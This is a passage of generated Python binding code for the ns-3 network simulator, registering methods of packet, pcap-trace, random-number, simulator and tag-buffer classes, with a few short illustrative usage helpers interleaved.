## packetbb.h (module 'network'): int ns3::PbbAddressTlvBlock::Size() const [member function]
cls.add_method('Size',
'int',
[],
is_const=True)
return
def register_Ns3PbbTlvBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbTlvBlock::PbbTlvBlock(ns3::PbbTlvBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbTlvBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbTlvBlock::PbbTlvBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbTlvBlock::Back() const [member function]
cls.add_method('Back',
'ns3::Ptr< ns3::PbbTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Begin() [member function]
cls.add_method('Begin',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): bool ns3::PbbTlvBlock::Empty() const [member function]
cls.add_method('Empty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::End() [member function]
cls.add_method('End',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Erase(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > last) [member function]
cls.add_method('Erase',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbTlv> ns3::PbbTlvBlock::Front() const [member function]
cls.add_method('Front',
'ns3::Ptr< ns3::PbbTlv >',
[],
is_const=True)
## packetbb.h (module 'network'): uint32_t ns3::PbbTlvBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > ns3::PbbTlvBlock::Insert(std::_List_iterator<ns3::Ptr<ns3::PbbTlv> > position, ns3::Ptr<ns3::PbbTlv> const tlv) [member function]
cls.add_method('Insert',
'std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbTlv > >', 'position'), param('ns3::Ptr< ns3::PbbTlv > const', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PopBack() [member function]
cls.add_method('PopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PopFront() [member function]
cls.add_method('PopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PushBack(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('PushBack',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::PushFront(ns3::Ptr<ns3::PbbTlv> tlv) [member function]
cls.add_method('PushFront',
'void',
[param('ns3::Ptr< ns3::PbbTlv >', 'tlv')])
## packetbb.h (module 'network'): void ns3::PbbTlvBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): int ns3::PbbTlvBlock::Size() const [member function]
cls.add_method('Size',
'int',
[],
is_const=True)
return
def register_Ns3PcapFile_methods(root_module, cls):
## pcap-file.h (module 'network'): ns3::PcapFile::PcapFile() [constructor]
cls.add_constructor([])
## pcap-file.h (module 'network'): void ns3::PcapFile::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## pcap-file.h (module 'network'): void ns3::PcapFile::Close() [member function]
cls.add_method('Close',
'void',
[])
## pcap-file.h (module 'network'): static bool ns3::PcapFile::Diff(std::string const & f1, std::string const & f2, uint32_t & sec, uint32_t & usec, uint32_t snapLen=ns3::PcapFile::SNAPLEN_DEFAULT) [member function]
cls.add_method('Diff',
'bool',
[param('std::string const &', 'f1'), param('std::string const &', 'f2'), param('uint32_t &', 'sec'), param('uint32_t &', 'usec'), param('uint32_t', 'snapLen', default_value='ns3::PcapFile::SNAPLEN_DEFAULT')],
is_static=True)
## pcap-file.h (module 'network'): bool ns3::PcapFile::Eof() const [member function]
cls.add_method('Eof',
'bool',
[],
is_const=True)
## pcap-file.h (module 'network'): bool ns3::PcapFile::Fail() const [member function]
cls.add_method('Fail',
'bool',
[],
is_const=True)
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetDataLinkType() [member function]
cls.add_method('GetDataLinkType',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetMagic() [member function]
cls.add_method('GetMagic',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetSigFigs() [member function]
cls.add_method('GetSigFigs',
'uint32_t',
[])
## pcap-file.h (module 'network'): uint32_t ns3::PcapFile::GetSnapLen() [member function]
cls.add_method('GetSnapLen',
'uint32_t',
[])
## pcap-file.h (module 'network'): bool ns3::PcapFile::GetSwapMode() [member function]
cls.add_method('GetSwapMode',
'bool',
[])
## pcap-file.h (module 'network'): int32_t ns3::PcapFile::GetTimeZoneOffset() [member function]
cls.add_method('GetTimeZoneOffset',
'int32_t',
[])
## pcap-file.h (module 'network'): uint16_t ns3::PcapFile::GetVersionMajor() [member function]
cls.add_method('GetVersionMajor',
'uint16_t',
[])
## pcap-file.h (module 'network'): uint16_t ns3::PcapFile::GetVersionMinor() [member function]
cls.add_method('GetVersionMinor',
'uint16_t',
[])
## pcap-file.h (module 'network'): void ns3::PcapFile::Init(uint32_t dataLinkType, uint32_t snapLen=ns3::PcapFile::SNAPLEN_DEFAULT, int32_t timeZoneCorrection=ns3::PcapFile::ZONE_DEFAULT, bool swapMode=false) [member function]
cls.add_method('Init',
'void',
[param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='ns3::PcapFile::SNAPLEN_DEFAULT'), param('int32_t', 'timeZoneCorrection', default_value='ns3::PcapFile::ZONE_DEFAULT'), param('bool', 'swapMode', default_value='false')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Open(std::string const & filename, std::_Ios_Openmode mode) [member function]
cls.add_method('Open',
'void',
[param('std::string const &', 'filename'), param('std::_Ios_Openmode', 'mode')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Read(uint8_t * const data, uint32_t maxBytes, uint32_t & tsSec, uint32_t & tsUsec, uint32_t & inclLen, uint32_t & origLen, uint32_t & readLen) [member function]
cls.add_method('Read',
'void',
[param('uint8_t * const', 'data'), param('uint32_t', 'maxBytes'), param('uint32_t &', 'tsSec'), param('uint32_t &', 'tsUsec'), param('uint32_t &', 'inclLen'), param('uint32_t &', 'origLen'), param('uint32_t &', 'readLen')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, uint8_t const * const data, uint32_t totalLen) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('uint8_t const * const', 'data'), param('uint32_t', 'totalLen')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file.h (module 'network'): void ns3::PcapFile::Write(uint32_t tsSec, uint32_t tsUsec, ns3::Header & header, ns3::Ptr<const ns3::Packet> p) [member function]
cls.add_method('Write',
'void',
[param('uint32_t', 'tsSec'), param('uint32_t', 'tsUsec'), param('ns3::Header &', 'header'), param('ns3::Ptr< ns3::Packet const >', 'p')])
## pcap-file.h (module 'network'): ns3::PcapFile::SNAPLEN_DEFAULT [variable]
cls.add_static_attribute('SNAPLEN_DEFAULT', 'uint32_t const', is_const=True)
## pcap-file.h (module 'network'): ns3::PcapFile::ZONE_DEFAULT [variable]
cls.add_static_attribute('ZONE_DEFAULT', 'int32_t const', is_const=True)
return
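# Illustrative sketch (not part of the generated output): per-class helpers such as
# register_Ns3PcapFile_methods() above are normally driven by the module's central
# register_methods() dispatcher, which looks the wrapped class up on the root module.
# The helper below only mirrors that call pattern and is never invoked in this file.
def _example_dispatch_pcapfile_registration(root_module):
    # Same root_module['ns3::...'] lookup idiom the generator uses elsewhere in this
    # file (e.g. root_module['ns3::SequenceNumber32'] in the operator registrations).
    register_Ns3PcapFile_methods(root_module, root_module['ns3::PcapFile'])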
def register_Ns3PcapHelper_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::PcapHelper::PcapHelper(ns3::PcapHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PcapHelper const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::PcapHelper::PcapHelper() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): ns3::Ptr<ns3::PcapFileWrapper> ns3::PcapHelper::CreateFile(std::string filename, std::_Ios_Openmode filemode, uint32_t dataLinkType, uint32_t snapLen=65535, int32_t tzCorrection=0) [member function]
cls.add_method('CreateFile',
'ns3::Ptr< ns3::PcapFileWrapper >',
[param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode'), param('uint32_t', 'dataLinkType'), param('uint32_t', 'snapLen', default_value='65535'), param('int32_t', 'tzCorrection', default_value='0')])
## trace-helper.h (module 'network'): std::string ns3::PcapHelper::GetFilenameFromDevice(std::string prefix, ns3::Ptr<ns3::NetDevice> device, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromDevice',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'useObjectNames', default_value='true')])
## trace-helper.h (module 'network'): std::string ns3::PcapHelper::GetFilenameFromInterfacePair(std::string prefix, ns3::Ptr<ns3::Object> object, uint32_t interface, bool useObjectNames=true) [member function]
cls.add_method('GetFilenameFromInterfacePair',
'std::string',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::Object >', 'object'), param('uint32_t', 'interface'), param('bool', 'useObjectNames', default_value='true')])
return
def register_Ns3PcapHelperForDevice_methods(root_module, cls):
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice::PcapHelperForDevice(ns3::PcapHelperForDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PcapHelperForDevice const &', 'arg0')])
## trace-helper.h (module 'network'): ns3::PcapHelperForDevice::PcapHelperForDevice() [constructor]
cls.add_constructor([])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool promiscuous=false, bool explicitFilename=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'promiscuous', default_value='false'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, std::string ndName, bool promiscuous=false, bool explicitFilename=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('std::string', 'ndName'), param('bool', 'promiscuous', default_value='false'), param('bool', 'explicitFilename', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::NetDeviceContainer d, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::NetDeviceContainer', 'd'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, ns3::NodeContainer n, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('ns3::NodeContainer', 'n'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcap(std::string prefix, uint32_t nodeid, uint32_t deviceid, bool promiscuous=false) [member function]
cls.add_method('EnablePcap',
'void',
[param('std::string', 'prefix'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcapAll(std::string prefix, bool promiscuous=false) [member function]
cls.add_method('EnablePcapAll',
'void',
[param('std::string', 'prefix'), param('bool', 'promiscuous', default_value='false')])
## trace-helper.h (module 'network'): void ns3::PcapHelperForDevice::EnablePcapInternal(std::string prefix, ns3::Ptr<ns3::NetDevice> nd, bool promiscuous, bool explicitFilename) [member function]
cls.add_method('EnablePcapInternal',
'void',
[param('std::string', 'prefix'), param('ns3::Ptr< ns3::NetDevice >', 'nd'), param('bool', 'promiscuous'), param('bool', 'explicitFilename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3RandomVariable_methods(root_module, cls):
cls.add_output_stream_operator()
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::RandomVariable::RandomVariable(ns3::RandomVariable const & o) [copy constructor]
cls.add_constructor([param('ns3::RandomVariable const &', 'o')])
## random-variable.h (module 'core'): uint32_t ns3::RandomVariable::GetInteger() const [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::RandomVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
return
def register_Ns3RngSeedManager_methods(root_module, cls):
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager::RngSeedManager() [constructor]
cls.add_constructor([])
## rng-seed-manager.h (module 'core'): ns3::RngSeedManager::RngSeedManager(ns3::RngSeedManager const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RngSeedManager const &', 'arg0')])
## rng-seed-manager.h (module 'core'): static uint64_t ns3::RngSeedManager::GetNextStreamIndex() [member function]
cls.add_method('GetNextStreamIndex',
'uint64_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static uint64_t ns3::RngSeedManager::GetRun() [member function]
cls.add_method('GetRun',
'uint64_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static uint32_t ns3::RngSeedManager::GetSeed() [member function]
cls.add_method('GetSeed',
'uint32_t',
[],
is_static=True)
## rng-seed-manager.h (module 'core'): static void ns3::RngSeedManager::SetRun(uint64_t run) [member function]
cls.add_method('SetRun',
'void',
[param('uint64_t', 'run')],
is_static=True)
## rng-seed-manager.h (module 'core'): static void ns3::RngSeedManager::SetSeed(uint32_t seed) [member function]
cls.add_method('SetSeed',
'void',
[param('uint32_t', 'seed')],
is_static=True)
return
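# Illustrative sketch only: a minimal use of the RngSeedManager methods registered
# above from Python, assuming the generated core bindings are importable as ns.core
# (the import path is an assumption, not dictated by this file).
def _example_rng_seed_manager_usage():
    import ns.core  # assumed import path for the ns-3 core bindings
    ns.core.RngSeedManager.SetSeed(3)  # fix the global seed
    ns.core.RngSeedManager.SetRun(7)   # select an independent run/substream
    return ns.core.RngSeedManager.GetSeed(), ns.core.RngSeedManager.GetRun()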
def register_Ns3SequenceNumber32_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('ns3::SequenceNumber< unsigned int, int > const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('int', 'right'))
cls.add_inplace_numeric_operator('+=', param('int', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::SequenceNumber32'], root_module['ns3::SequenceNumber32'], param('int', 'right'))
cls.add_inplace_numeric_operator('-=', param('int', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber() [constructor]
cls.add_constructor([])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber(unsigned int value) [constructor]
cls.add_constructor([param('unsigned int', 'value')])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned int, int>::SequenceNumber(ns3::SequenceNumber<unsigned int, int> const & value) [copy constructor]
cls.add_constructor([param('ns3::SequenceNumber< unsigned int, int > const &', 'value')])
## sequence-number.h (module 'network'): unsigned int ns3::SequenceNumber<unsigned int, int>::GetValue() const [member function]
cls.add_method('GetValue',
'unsigned int',
[],
is_const=True)
return
def register_Ns3SequenceNumber16_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('ns3::SequenceNumber< unsigned short, short > const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('short int', 'right'))
cls.add_inplace_numeric_operator('+=', param('short int', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::SequenceNumber16'], root_module['ns3::SequenceNumber16'], param('short int', 'right'))
cls.add_inplace_numeric_operator('-=', param('short int', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber() [constructor]
cls.add_constructor([])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber(short unsigned int value) [constructor]
cls.add_constructor([param('short unsigned int', 'value')])
## sequence-number.h (module 'network'): ns3::SequenceNumber<unsigned short, short>::SequenceNumber(ns3::SequenceNumber<unsigned short, short> const & value) [copy constructor]
cls.add_constructor([param('ns3::SequenceNumber< unsigned short, short > const &', 'value')])
## sequence-number.h (module 'network'): short unsigned int ns3::SequenceNumber<unsigned short, short>::GetValue() const [member function]
cls.add_method('GetValue',
'short unsigned int',
[],
is_const=True)
return
def register_Ns3SequentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(ns3::SequentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SequentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, double i=1, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('double', 'i', default_value='1'), param('uint32_t', 'c', default_value='1')])
## random-variable.h (module 'core'): ns3::SequentialVariable::SequentialVariable(double f, double l, ns3::RandomVariable const & i, uint32_t c=1) [constructor]
cls.add_constructor([param('double', 'f'), param('double', 'l'), param('ns3::RandomVariable const &', 'i'), param('uint32_t', 'c', default_value='1')])
return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::SimpleRefCount(ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter>::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3Simulator_methods(root_module, cls):
## simulator.h (module 'core'): ns3::Simulator::Simulator(ns3::Simulator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
## simulator.h (module 'core'): static void ns3::Simulator::Cancel(ns3::EventId const & id) [member function]
cls.add_method('Cancel',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Destroy() [member function]
cls.add_method('Destroy',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetContext() [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetDelayLeft(ns3::EventId const & id) [member function]
cls.add_method('GetDelayLeft',
'ns3::Time',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static ns3::Ptr<ns3::SimulatorImpl> ns3::Simulator::GetImplementation() [member function]
cls.add_method('GetImplementation',
'ns3::Ptr< ns3::SimulatorImpl >',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::GetMaximumSimulationTime() [member function]
cls.add_method('GetMaximumSimulationTime',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static uint32_t ns3::Simulator::GetSystemId() [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsExpired(ns3::EventId const & id) [member function]
cls.add_method('IsExpired',
'bool',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static bool ns3::Simulator::IsFinished() [member function]
cls.add_method('IsFinished',
'bool',
[],
is_static=True)
## simulator.h (module 'core'): static ns3::Time ns3::Simulator::Now() [member function]
cls.add_method('Now',
'ns3::Time',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Remove(ns3::EventId const & id) [member function]
cls.add_method('Remove',
'void',
[param('ns3::EventId const &', 'id')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetImplementation(ns3::Ptr<ns3::SimulatorImpl> impl) [member function]
cls.add_method('SetImplementation',
'void',
[param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::SetScheduler(ns3::ObjectFactory schedulerFactory) [member function]
cls.add_method('SetScheduler',
'void',
[param('ns3::ObjectFactory', 'schedulerFactory')],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop() [member function]
cls.add_method('Stop',
'void',
[],
is_static=True)
## simulator.h (module 'core'): static void ns3::Simulator::Stop(ns3::Time const & time) [member function]
cls.add_method('Stop',
'void',
[param('ns3::Time const &', 'time')],
is_static=True)
return
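# Illustrative sketch only: exercising a few of the static Simulator methods bound
# above, again assuming the core bindings import as ns.core; Seconds() and
# Time.GetSeconds() are assumed to be wrapped in that module as well.
def _example_simulator_usage():
    import ns.core  # assumed import path
    ns.core.Simulator.Stop(ns.core.Seconds(10.0))  # schedule the stop time
    now = ns.core.Simulator.Now().GetSeconds()     # current simulation time
    finished = ns.core.Simulator.IsFinished()
    ns.core.Simulator.Destroy()                    # release simulator resources
    return now, finished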
def register_Ns3SystemWallClockMs_methods(root_module, cls):
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs(ns3::SystemWallClockMs const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SystemWallClockMs const &', 'arg0')])
## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs::SystemWallClockMs() [constructor]
cls.add_constructor([])
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::End() [member function]
cls.add_method('End',
'int64_t',
[])
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedReal() const [member function]
cls.add_method('GetElapsedReal',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedSystem() const [member function]
cls.add_method('GetElapsedSystem',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): int64_t ns3::SystemWallClockMs::GetElapsedUser() const [member function]
cls.add_method('GetElapsedUser',
'int64_t',
[],
is_const=True)
## system-wall-clock-ms.h (module 'core'): void ns3::SystemWallClockMs::Start() [member function]
cls.add_method('Start',
'void',
[])
return
def register_Ns3Tag_methods(root_module, cls):
## tag.h (module 'network'): ns3::Tag::Tag() [constructor]
cls.add_constructor([])
## tag.h (module 'network'): ns3::Tag::Tag(ns3::Tag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Tag const &', 'arg0')])
## tag.h (module 'network'): void ns3::Tag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_virtual=True)
## tag.h (module 'network'): uint32_t ns3::Tag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): static ns3::TypeId ns3::Tag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## tag.h (module 'network'): void ns3::Tag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## tag.h (module 'network'): void ns3::Tag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TagBuffer_methods(root_module, cls):
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(ns3::TagBuffer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
## tag-buffer.h (module 'network'): ns3::TagBuffer::TagBuffer(uint8_t * start, uint8_t * end) [constructor]
cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3TriangularVariable_methods(root_module, cls):
